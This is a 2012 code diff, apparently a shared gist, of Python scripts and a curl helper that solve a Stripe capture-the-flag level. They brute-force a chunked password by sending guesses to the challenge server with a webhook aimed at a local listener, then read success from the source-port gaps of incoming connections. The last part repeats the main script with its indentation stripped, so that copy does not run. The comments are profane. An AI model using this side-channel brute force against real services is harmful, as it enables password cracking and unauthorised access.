eskerda · August 29, 2012 15:00
diff --git a/base_crack.py b/base_crack.py
 #!/usr/bin/env python
 import socket
 import urllib2
 import json
 import sys
 import time

 """
 LET'S LOOK FOR HIGHER PORT DIFFERENCES MOTHERFUCKER

 This piece of shit works sometimes..

 Spin me with ./base_crack.py <pattern> <port> <output_file> <delta to filter> <number of desired results> <action>

 If no action specified defaults to start

 If action is read, it will load up a json file with current guesses and
 continue from there.

 For instance ./base_crack.py %d03000000 998877 my_guess_chunk_1.json 2 0
 Would keep trying to find a chunk which answer takes more than "2 ports"
 If it keeps looping with just one, that's the good one.
 If it ends, then FUCK EVERYTHING ABOUT This

 You can always set number of desired results to 1 and it *could* work

 This thing works manually. Which means that for getting all the 4 chunks you will:
 ./base_crack.py %03d000000000 998877 my_guess_chunk_1.json 2 0 start 
 ./base_crack.py XXX%03d000000 998877 my_guess_chunk_2.json 3 0 start
 ./base_crack.py XXXXXX%03d000 998877 my_guess_chunk_3.json 4 0 start
 ./base_crack.py XXXXXXXXX%03d 998877 my_guess_chunk_4.json 5 0 start
 Where X is a safe chunk and 0 are 0

 For the 4th chunk, it's better to use
 ./test_final_chunk.py XXXXXXXXX%03d result.json <start | read>

 You could at any point continue where you were by
 ./base_crack.py XXX%03d000000 998877 my_guess_chunk_2.json 3 0 read

 On the question on why this sucks so much, well, really it got "improved" while it was working
 So, instead of just killing it, it got tweaked until it sort of worked.


 Fire it up by: 
 ---- curl.sh ----
 #!/bin/bash
 DATA='{"password":"0123456789012","webhooks":["level02-2.stripe-ctf.com:'$1'"]}'
 curl https://level08-4.stripe-ctf.com/user-fvrloyxjgo/ -d $DATA

 sh curl.sh PORT_NUM
 """

 HOST = "level02-2.stripe-ctf.com"
 PORT = int(sys.argv[2])
 SAFE = "https://level08-4.stripe-ctf.com/user-fvrloyxjgo/"
 webhooks = [ "%s:%s" % (HOST, PORT) ]
 filename = sys.argv[3]

 base_delta = int(sys.argv[4])
 try:
    n_results = int(sys.argv[5])
 except IndexError:
    n_results = 5

 try:
    action = sys.argv[6]
 except IndexError:
    action = 'start'

 def storeJSONArray(json_array, filename):
    dump = json.dumps(json_array)
    f = open(filename,'w')
    f.write(dump)
    f.close()

 def loadJSONArray(filename):
    f = open(filename, 'r')
    dump = f.read()
    f.close()
    return json.loads(dump)

 def getPort(server):
    try:
        print "Waiting for a post in %d" % PORT
        conn, addr = server.accept()
        return addr[1]
    except Exception:
        return False

 def makeMyGuess(guess):
    try:
        print "Guessing %s" % guess
        data = { "password": guess, "webhooks": webhooks }
        req = urllib2.urlopen(SAFE, json.dumps(data), 30)
        return True
    except Exception:
        return False

 def main( args ):
    pattern = args[1]
    # Fill interesting
    if action == 'read':
        interesting = loadJSONArray(filename)
    else:
        interesting = []
        for i in range(1000):
            interesting.append({
                "guess": pattern % i,
                "delta": base_delta, # Worst guess scenario
            })

    # Start socket
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(("0.0.0.0", PORT))
    server.listen(1)
    server.settimeout(30)
    last_port = False
    while not last_port:
        last_port = getPort(server)
    while len(interesting) > n_results:
        elem = interesting.pop()
        # Make your guess!
        while not makeMyGuess(elem.get('guess')):
            print "sleeping 1s and retrying"
            time.sleep(1)
        port = False
        tries = 0
        while not port:
            port = getPort(server)
            tries = tries +1
        if tries > 1:
            interesting.append(elem)
            storeJSONArray(interesting, filename)
            last_port = port
            print "Delta not really reliable"
            continue

        delta = port - last_port
        last_port = port
        print "Delta is %d" % delta
        if (delta > base_delta):
            if (elem.get('delta') == base_delta or delta < elem.get('delta')):
                print "interesting %s , delta is %d" % (elem.get('guess'), delta)
                print "stats: %d guesses" % len(interesting)
                elem['delta'] = delta
            else:
                print "not relevant, old delta %s was smaller (but different from base_delta)" % (elem.get('delta'))
            interesting.insert(0, elem)
        elif (delta < 0):
            print "negative delta.. %d? reinserting for latter testing" % (delta)
            interesting.insert(0, elem)
        else:
            print "Discarding %s , delta was %d vs %d" % (elem.get('guess'), delta, base_delta)

        storeJSONArray(interesting, filename)
        print "----------"

    print interesting

 if __name__ == '__main__':
    main(sys.argv)
diff --git a/curl.sh b/curl.sh
 DATA='{"password":"0123456789012","webhooks":["level02-2.stripe-ctf.com:'$1'"]}'
 curl https://level08-4.stripe-ctf.com/user-fvrloyxjgo/ -d $DATA
diff --git a/test_final_chunk.py b/test_final_chunk.py
 #!/usr/bin/env python
 import socket
 import urllib2
 import json
 import sys
 import time

 """
 LET'S LOOK FOR HIGHER PORT DIFFERENCES MOTHERFUCKER

 This piece of shit works sometimes..

 ./test_final_chunk.py XXXXXXXXX%03d result.json start | read
 """

 SAFE = "https://level08-4.stripe-ctf.com/user-fvrloyxjgo/"
 webhooks = []
 pattern = sys.argv[1]
 filename = sys.argv[2]
 try:
    action = sys.argv[3]
 except IndexError:
    action = 'start'

 def storeJSONArray(json_array, filename):
    dump = json.dumps(json_array)
    f = open(filename,'w')
    f.write(dump)
    f.close()

 def loadJSONArray(filename):
    f = open(filename, 'r')
    dump = f.read()
    f.close()
    return json.loads(dump)

 def makeMyGuess(guess):
    print "Guessing %s" % guess
    data = { "password": guess, "webhooks": webhooks }
    req = urllib2.urlopen(SAFE, json.dumps(data), 30)
    response = req.read()
    return not 'false' in response

 def main( args ):
    # Fill interesting
    if action == 'read':
        interesting = loadJSONArray(filename)
    else:
        interesting = []
        for i in range(1000):
            interesting.append({
                "guess": pattern % i
            })

    while len(interesting) > 0:
        elem = interesting.pop()
        # Make your guess!
        if makeMyGuess(elem.get('guess')):
            print "Done crackin!"
            print "CTF is %s" % elem.get('guess')
            exit(0)
        else:
            print "Bad code %s, going next" % elem.get('guess')
        storeJSONArray(interesting, filename)
        print "----------"
    print "No code found..."

 if __name__ == '__main__':
    main(sys.argv)
	#!/usr/bin/env python
	import socket
	import urllib2
	import json
	import sys
	import time

	"""
	LET'S LOOK FOR HIGHER PORT DIFFERENCES MOTHERFUCKER

	This piece of shit works sometimes..

	Spin me with ./base_crack.py <pattern> <port> <output_file> <delta to filter> <number of desired results> <action>

	If no action specified defaults to start

	If action is read, it will load up a json file with current guesses and
	continue from there.

	For instance ./base_crack.py %d03000000 998877 my_guess_chunk_1.json 2 0
	Would keep trying to find a chunk which answer takes more than "2 ports"
	If it keeps looping with just one, that's the good one.
	If it ends, then FUCK EVERYTHING ABOUT This

	You can always set number of desired results to 1 and it could work

	This thing works manually. Which means that for getting all the 4 chunks you will:
	./base_crack.py %03d000000000 998877 my_guess_chunk_1.json 2 0 start
	./base_crack.py XXX%03d000000 998877 my_guess_chunk_2.json 3 0 start
	./base_crack.py XXXXXX%03d000 998877 my_guess_chunk_3.json 4 0 start
	./base_crack.py XXXXXXXXX%03d 998877 my_guess_chunk_4.json 5 0 start
	Where X is a safe chunk and 0 are 0

	For the 4th chunk, it's better to use
	./test_final_chunk.py XXXXXXXXX%03d result.json <start \| read>

	You could at any point continue where you were by
	./base_crack.py XXX%03d000000 998877 my_guess_chunk_2.json 3 0 read

	On the question on why this sucks so much, well, really it got "improved" while it was working
	So, instead of just killing it, it got tweaked until it sort of worked.


	Fire it up by:
	---- curl.sh ----
	#!/bin/bash
	DATA='{"password":"0123456789012","webhooks":["level02-2.stripe-ctf.com:'$1'"]}'
	curl https://level08-4.stripe-ctf.com/user-fvrloyxjgo/ -d $DATA

	sh curl.sh PORT_NUM
	"""

	HOST = "level02-2.stripe-ctf.com"
	PORT = int(sys.argv[2])
	SAFE = "https://level08-4.stripe-ctf.com/user-fvrloyxjgo/"
	webhooks = [ "%s:%s" % (HOST, PORT) ]
	filename = sys.argv[3]

	base_delta = int(sys.argv[4])
	try:
	n_results = int(sys.argv[5])
	except IndexError:
	n_results = 5

	try:
	action = sys.argv[6]
	except IndexError:
	action = 'start'

	def storeJSONArray(json_array, filename):
	dump = json.dumps(json_array)
	f = open(filename,'w')
	f.write(dump)
	f.close()

	def loadJSONArray(filename):
	f = open(filename, 'r')
	dump = f.read()
	f.close()
	return json.loads(dump)

	def getPort(server):
	try:
	print "Waiting for a post in %d" % PORT
	conn, addr = server.accept()
	return addr[1]
	except Exception:
	return False

	def makeMyGuess(guess):
	try:
	print "Guessing %s" % guess
	data = { "password": guess, "webhooks": webhooks }
	req = urllib2.urlopen(SAFE, json.dumps(data), 30)
	return True
	except Exception:
	return False

	def main( args ):
	pattern = args[1]
	# Fill interesting
	if action == 'read':
	interesting = loadJSONArray(filename)
	else:
	interesting = []
	for i in range(1000):
	interesting.append({
	"guess": pattern % i,
	"delta": base_delta, # Worst guess scenario
	})

	# Start socket
	server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	server.bind(("0.0.0.0", PORT))
	server.listen(1)
	server.settimeout(30)
	last_port = False
	while not last_port:
	last_port = getPort(server)
	while len(interesting) > n_results:
	elem = interesting.pop()
	# Make your guess!
	while not makeMyGuess(elem.get('guess')):
	print "sleeping 1s and retrying"
	time.sleep(1)
	port = False
	tries = 0
	while not port:
	port = getPort(server)
	tries = tries +1
	if tries > 1:
	interesting.append(elem)
	storeJSONArray(interesting, filename)
	last_port = port
	print "Delta not really reliable"
	continue

	delta = port - last_port
	last_port = port
	print "Delta is %d" % delta
	if (delta > base_delta):
	if (elem.get('delta') == base_delta or delta < elem.get('delta')):
	print "interesting %s , delta is %d" % (elem.get('guess'), delta)
	print "stats: %d guesses" % len(interesting)
	elem['delta'] = delta
	else:
	print "not relevant, old delta %s was smaller (but different from base_delta)" % (elem.get('delta'))
	interesting.insert(0, elem)
	elif (delta < 0):
	print "negative delta.. %d? reinserting for latter testing" % (delta)
	interesting.insert(0, elem)
	else:
	print "Discarding %s , delta was %d vs %d" % (elem.get('guess'), delta, base_delta)

	storeJSONArray(interesting, filename)
	print "----------"

	print interesting

	if __name__ == '__main__':
	main(sys.argv)